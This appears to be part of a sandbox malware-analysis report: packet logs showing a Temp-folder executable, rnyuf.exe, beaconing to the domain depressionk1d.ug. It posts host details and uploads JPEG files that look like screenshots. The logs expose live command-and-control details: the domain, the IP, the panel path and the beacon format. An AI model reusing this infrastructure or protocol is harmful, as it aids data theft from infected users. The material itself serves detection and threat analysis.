                          319192.168.2.450145178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:21.102976084 CET14693OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:21.130384922 CET14693INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:21 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          32192.168.2.449816178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:30.123914003 CET3893OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 31
                          Cache-Control: no-cache
                          Data Raw: 65 30 3d 31 30 30 30 31 30 36 30 30 31 26 75 6e 69 74 3d 31 35 32 31 33 38 35 33 33 32 31 39
                          Data Ascii: e0=1000106001&unit=152138533219
                          Nov 12, 2021 22:23:30.149957895 CET3893INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:30 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          320192.168.2.450146178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:21.263261080 CET14694OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:21.292978048 CET14695INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:21 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          321192.168.2.450147178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:21.448810101 CET14695OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:21.477171898 CET14696INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:21 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          322192.168.2.450149178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:21.611221075 CET14698OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:21.643166065 CET14698INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:21 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          323192.168.2.450150178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:21.792020082 CET15223OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:21.818232059 CET15262INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:21 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          324192.168.2.450151178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:21.792907000 CET15223OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----66fb56215c6a9fc0af8f0f17b5d10c80
                          Host: depressionk1d.ug
                          Content-Length: 107062
                          Cache-Control: no-cache
                          Nov 12, 2021 22:24:21.792993069 CET15223OUTData Raw: 2d 2d 2d 2d 2d 2d 36 36 66 62 35 36 32 31 35 63 36 61 39 66 63 30 61 66 38 66 30 66 31 37 62 35 64 31 30 63 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------66fb56215c6a9fc0af8f0f17b5d10c80Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:21.793184996 CET15233OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:21.793258905 CET15236OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:21.815552950 CET15239OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:21.815583944 CET15242OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:24:21.815623045 CET15244OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:24:21.815633059 CET15246OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:24:21.815644979 CET15247OUTData Raw: 92 8a 00 08 a4 c7 b5 2e 68 ce 68 d0 04 c7 14 52 d2 50 02 13 c5 34 d2 d2 54 94 36 93 bd 3e 93 bd 21 91 56 cf 86 7f e4 25 27 fd 71 3f cc 56 35 74 be 08 d3 2f 75 6d 6e 5b 6b 08 1a 79 85 bb 3e c5 20 1c 06 5f 5f ad 69 87 92 8d 58 b9 3b 23 3c 4c 5c a9
                          Data Ascii: .hhRP4T6>!V%'q?V5t/umn[ky> __iX;#<L\IE]Hb2b0J/x<I *>(LzcK|s9I;;>Yueu_7$'Yz:,rlt
                          Nov 12, 2021 22:24:21.815673113 CET15250OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:24:21.815697908 CET15253OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:24:21.888654947 CET15334INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:21 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          325192.168.2.450152178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:21.953377008 CET15335OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:21.979717970 CET15336INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:21 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          326192.168.2.450153178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:22.180668116 CET15336OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:22.206614971 CET15337INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:22 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          327192.168.2.450154178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:22.342566013 CET15338OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:22.368038893 CET15338INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:22 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          328192.168.2.450155178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:22.497692108 CET15593OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:22.524527073 CET15593INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:22 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          329192.168.2.450156178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:22.656893969 CET15594OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:22.682028055 CET15595INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:22 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          33192.168.2.449817178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:30.191339016 CET3893OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----a2459fec127b5ebc62fbd1a7f421763d
                          Host: depressionk1d.ug
                          Content-Length: 108376
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:30.191468000 CET3894OUTData Raw: 2d 2d 2d 2d 2d 2d 61 32 34 35 39 66 65 63 31 32 37 62 35 65 62 63 36 32 66 62 64 31 61 37 66 34 32 31 37 36 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------a2459fec127b5ebc62fbd1a7f421763dContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:30.191692114 CET3904OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:30.191921949 CET3906OUTData Raw: ed a0 ad 16 0b 8c a5 a3 6d 18 34 86 14 87 ad 2d 14 c4 25 2d 14 0a 06 14 51 41 a0 41 45 2a ab 31 c2 a9 27 d0 0a b2 9a 75 e4 9f 76 dd ff 00 e0 43 1f ce 84 9b d8 2e 55 a2 b4 93 44 ba 6f bc 63 4f a9 cf f2 aa d7 b6 86 ca 65 8c b8 62 57 76 40 c7 73 fe
                          Data Ascii: m4-%-QAAE*1'uvC.UDocOebWv@sNJhEvQE(((C@EPK@RHqlU a5dZ?*y#v1\AE-R@KK1@E-(P)hE-(&)h(-&(.(0
                          Nov 12, 2021 22:23:30.214049101 CET3909OUTData Raw: e1 ed 71 ec 61 bc d2 e6 99 a3 b1 bf 8c c6 ec 0f fa a6 23 01 fe 9d 8f a8 ad bf f8 55 5a e7 fc fd e9 df f7 f1 ff 00 f8 8a 3f e1 55 eb 9f f3 f7 a7 7f df c7 ff 00 e2 2b df 78 8c 1f 27 b3 e6 56 3e 75 61 f1 9c fe d3 95 dc d0 f0 77 88 26 b9 bb d2 b4 2b
                          Data Ascii: qa#UZ?U+x'V>uaw&++1\PA>W|n/z|/[EuqfCp(Tc*=GzQhyIU;GEP/E^4.J9\aAdq~?.J
                          Nov 12, 2021 22:23:30.214085102 CET3912OUTData Raw: 7a b1 94 69 ba 6d e5 e9 88 03 20 b6 81 a4 d9 9e 99 da 0e 3a 1e b5 5d 2d e7 92 09 a7 8e 19 1e 18 31 e6 c8 a8 4a c7 93 81 b8 f6 c9 e3 9a 8f aa bf e7 fc 11 5f 5c a1 ff 00 3e 7f f2 66 7b c7 8c 7e 29 e8 7a a7 87 6e 2c ac b7 93 21 52 c5 d9 33 80 41 c0
                          Data Ascii: zim :]-1J_\>f{~)zn,!R3ANN@evOZNw3 e8#*)!!'A*orFG#>ESm_ahFaz_Ch (EPIKIH(G4Q0J^i(E- JJ(<4q?R0,w
                          Nov 12, 2021 22:23:30.214179993 CET3920OUTData Raw: cd 17 b1 5a 03 2b 47 74 64 72 64 90 2e 4f cc 9b 30 e7 82 17 19 e2 b6 34 4b 5b 7b 4d 32 c7 49 d4 75 cb 2b 49 35 b3 33 de 43 30 99 e4 75 70 63 81 83 22 32 70 e1 9c 65 87 50 7d eb ce bc a5 f4 a0 42 80 74 eb 4d d1 6d 38 f4 62 55 52 7c dd 51 e9 90 af
                          Data Ascii: Z+Gtdrd.O04K[{M2Iu+I53C0upc"2peP}BtMm8bUR|Q{sMm<goN+G3CIm)(n$98XB):b3%V-Y/[b-.U#\t<|G>ZcTN{jc+_A(QE)E@F(QEQE
                          Nov 12, 2021 22:23:30.214193106 CET3925OUTData Raw: aa c4 0c 9e 70 0f d2 be 79 2a 3d 29 d4 62 b7 a5 4f 91 58 c6 a5 4e 77 70 00 53 a9 29 6b 53 26 02 8a 28 a0 03 bd 14 51 de 98 05 14 b4 50 02 60 1e d4 9b 01 a7 0a 5a 2c 2b b2 32 94 85 0e 6a 5a 31 4a c3 52 21 da 68 c5 4d 46 33 da 8e 50 e6 21 a2 a6 da
                          Data Ascii: py*=)bOXNwpS)kS&(QP`Z,+2jZ1JR!hMF3P!V>dD)i_Yt2];QKQ%P!)ihb1N&(QEQE-0Z(hS\Np9()h bEii-Q"m8SZJZbZ()hZ1LZ1-2E@
                          Nov 12, 2021 22:23:30.214229107 CET3927OUTData Raw: 53 b2 15 e4 b6 20 36 8c 3a 73 51 98 d9 4e 08 ab c1 ea 4d ca 7b 51 60 f6 92 5b 99 9b 7d a8 c1 ad 23 14 6d da 98 6d 41 e8 6a 6c 3f 6a 8a 3b 69 76 d5 93 6c e3 de 99 e5 90 79 14 ca e7 4c 87 65 26 ca b0 12 97 6d 01 ce 54 31 e6 a3 68 7d aa fe cc d1 e5
                          Data Ascii: S 6:sQNM{Q`[}#mmAjl?j;ivlyLe&mT1h}fCUle<]D.fa<tA[mUa:L1-;U)!j+P&=FAJJE4jlRfm$uCy{vD!=w:Mh@n7,Y.aj92V=OK
                          Nov 12, 2021 22:23:30.214260101 CET3930OUTData Raw: 68 a5 a3 69 a5 c1 a5 60 b8 53 85 18 a5 02 99 37 12 96 8c 51 de 9a 10 b4 b4 52 8a 62 12 9c 29 29 d5 48 4c 28 14 62 97 14 12 2d 38 53 71 4e 15 62 62 d3 a9 b4 ea 68 96 2d 28 a4 a5 15 42 16 96 92 9c 29 a2 45 02 9d 8a 4a 5a a4 48 62 97 14 52 d5 58 57
                          Data Ascii: hi`S7QRb))HL(b-8SqNbbh-(B)EJZHbRXWm&)XW#AZb(smM9qKe.PDDRF|9F{Tm.P"1!aC*1G"E_zotM(cUCaNkG/ejBti>T6?hSNmOb)Nh:dTS
                          Nov 12, 2021 22:23:30.214288950 CET3932OUTData Raw: b0 93 cd d2 5a f6 28 c9 7b 38 b8 46 70 30 48 5e 01 e7 1d ff 00 1a ca f1 5e d5 f1 4e a2 aa 02 aa cc 40 00 70 38 14 cd 0f e2 cf 86 34 0b 5b 8b 6b 5d 1f 50 68 a5 9c cc 03 98 f2 bd 30 33 9e 71 8e 2b cf 7c 47 e2 a9 75 3f 15 6a 1a b5 83 4d 04 37 52 07
                          Data Ascii: Z({8Fp0H^^N@p84[k]Ph03q+|Gu?jM7RIG#sVEZ.GK[;;;I5b63;WEgk+8j+$A|@k1W,0bR=MxxtT4)GY[Mi/$&DC^6(W
                          Nov 12, 2021 22:23:30.285840034 CET4005INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:30 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
